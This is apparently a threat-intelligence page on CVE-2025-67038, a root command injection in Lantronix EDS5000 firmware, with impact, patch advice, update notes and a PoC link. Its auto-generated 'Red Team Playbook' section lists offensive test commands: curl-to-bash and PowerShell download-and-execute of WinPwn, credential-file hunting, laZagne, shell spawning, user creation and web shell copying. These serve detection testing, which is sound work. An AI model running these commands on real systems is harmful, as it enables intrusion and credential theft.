CVE-2025-67038
Overview
This vulnerability is a command injection flaw rooted in improper input sanitization within the HTTP RPC module of Lantronix EDS5000 firmware version 2.1.0.0R3. Specifically, the username parameter used during authentication failure handling is concatenated directly into a shell command without validation or escaping. This unsafe string concatenation occurs in the log-writing function, enabling injection of arbitrary operating system commands executed with root privileges.
Vulnerability Description
An issue was discovered in Lantronix EDS5000 2.1.0.0R3. The HTTP RPC module executes a shell command to write logs when user's authantication fails. The username is directly concatenated with the command without any sanitization. This allow attackers to inject arbitrary OS commands into the username parameter. Injected commands are executed with root privileges.
Impact
An unauthenticated attacker can execute arbitrary operating system commands with root privileges on affected devices by submitting specially crafted usernames during authentication attempts. This enables full system compromise without requiring valid credentials or user interaction. The attacker can manipulate system files, disrupt device functionality, or pivot within the network, potentially leading to data breaches or operational outages in environments relying on these Lantronix devices.
Solution
Lantronix has addressed this vulnerability in firmware version 2.1.0.0R4 or later for the EDS5000 series devices. Administrators should upgrade affected devices to the latest firmware as detailed in the advisory published on the official Lantronix website (http://lantronix.com) and referenced in the CISA ICS advisory ICSA-26-069-02 (https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-02). No specific workaround is provided; applying the vendor-supplied patch is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability identified in the Lantronix EDS5000 firmware stems from improper handling of user input within the HTTP RPC module. Specifically, when a user's authentication fails, the system executes a shell command to log this event. The critical flaw lies in the fact that the username provided during authentication is directly concatenated into the command without any form of sanitization or validation. This oversight allows an attacker to inject arbitrary operating system commands through the username parameter, which are executed with root privileges. Such a design flaw poses a significant risk, as it effectively grants an attacker full control over the device, enabling them to perform a wide range of malicious actions.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate a simple authentication attempt with a crafted username that includes malicious commands. For instance, by submitting a username that contains shell metacharacters, the attacker can manipulate the command execution context. This could lead to the execution of commands that compromise the integrity and confidentiality of the system. Furthermore, the lack of input validation means that even less sophisticated attackers could exploit this vulnerability with minimal effort, making it a critical concern for organizations using affected products.
The real-world impact of this vulnerability is profound, particularly for businesses relying on the affected Lantronix devices for network management and monitoring. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even complete system takeover. The potential for data breaches and the subsequent financial and reputational damage could be catastrophic. Organizations may face regulatory penalties, loss of customer trust, and significant recovery costs. Additionally, the high CVSS score of 9.8 indicates that this vulnerability poses an urgent threat that must be addressed promptly to mitigate risks.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular security assessments and penetration testing should be conducted to identify any instances of this vulnerability within their systems. Additionally, organizations should ensure that they are using the latest firmware versions provided by Lantronix, as updates may include patches that address this issue. Employing network intrusion detection systems (NIDS) can also help in monitoring for unusual authentication attempts that may indicate exploitation attempts. Furthermore, implementing strict access controls and user input validation mechanisms can significantly reduce the risk of command injection attacks.
In conclusion, the vulnerability present in the Lantronix EDS5000 firmware exemplifies the critical importance of secure coding practices, particularly in systems that handle sensitive operations. The ability for attackers to execute arbitrary commands with root privileges underscores the need for organizations to prioritize security in their network devices. By adopting proactive detection and mitigation strategies, businesses can safeguard their systems against such vulnerabilities, thereby protecting their assets and maintaining operational integrity.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-67038, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition by CISA underscores the vulnerability’s criticality and elevates its priority within federal and private sector risk management frameworks. The updated CVSS score of 9.8 reflects the high severity and potential impact of successful exploitation, particularly given the root-level command execution capability. Although no new exploit techniques or ransomware associations have surfaced, the increased telemetry signals a growing interest or scanning activity by threat actors. Consequently, this development signifies a heightened threat environment for organizations utilizing Lantronix EDS5000 devices, necessitating increased vigilance. The rise in the EPSS score, while still low, indicates an emerging likelihood of exploitation attempts, warranting closer monitoring. Overall, the threat level has escalated from theoretical to imminent, reinforcing the critical need for defenders to prioritize detection and response efforts around this vulnerability.
Update 2 — July 02, 2026
CSURFACE threat intelligence has identified a marked escalation in activity targeting CVE-2025-67038, accompanied by the emergence of a publicly available proof-of-concept exploit hosted on GitHub. This development significantly lowers the barrier to entry for threat actors, enabling a broader range of adversaries to weaponize the vulnerability with minimal technical effort. Our telemetry indicates a sharp increase in scanning and exploitation attempts, suggesting that threat actors are actively validating and leveraging this exploit in the wild. Although ransomware usage linked to this vulnerability remains unconfirmed, the availability of exploit code and the surge in detection activity elevate the risk profile considerably. Consequently, the threat level has shifted from a primarily theoretical concern to a practical and imminent risk, underscoring the urgency for defenders to enhance monitoring and incident response capabilities around affected Lantronix EDS5000 devices.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Lantronix | Eds5032 Firmware | 2.1.0.0r3 |
cpe:2.3:o:lantronix:eds5032_firmware:2.1.0.0r3:*:*:*:*:*:*:*
|
|
|
Lantronix | Eds5008 Firmware | 2.1.0.0r3 |
cpe:2.3:o:lantronix:eds5008_firmware:2.1.0.0r3:*:*:*:*:*:*:*
|
|
|
Lantronix | Eds5016 Firmware | 2.1.0.0r3 |
cpe:2.3:o:lantronix:eds5016_firmware:2.1.0.0r3:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
HORKimhab/CVE-2025-67038
CVE-2025-67038 - Draft
|
HORKimhab | 0 | 0 | 2026-06-25 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-67038 |
| lantronix.com |
GitHub CVE
|
http://lantronix.com |
| eds5000.com |
GitHub CVE
|
http://eds5000.com |
| cisa.gov |
GitHub CVE
|
https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-02 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-67038 |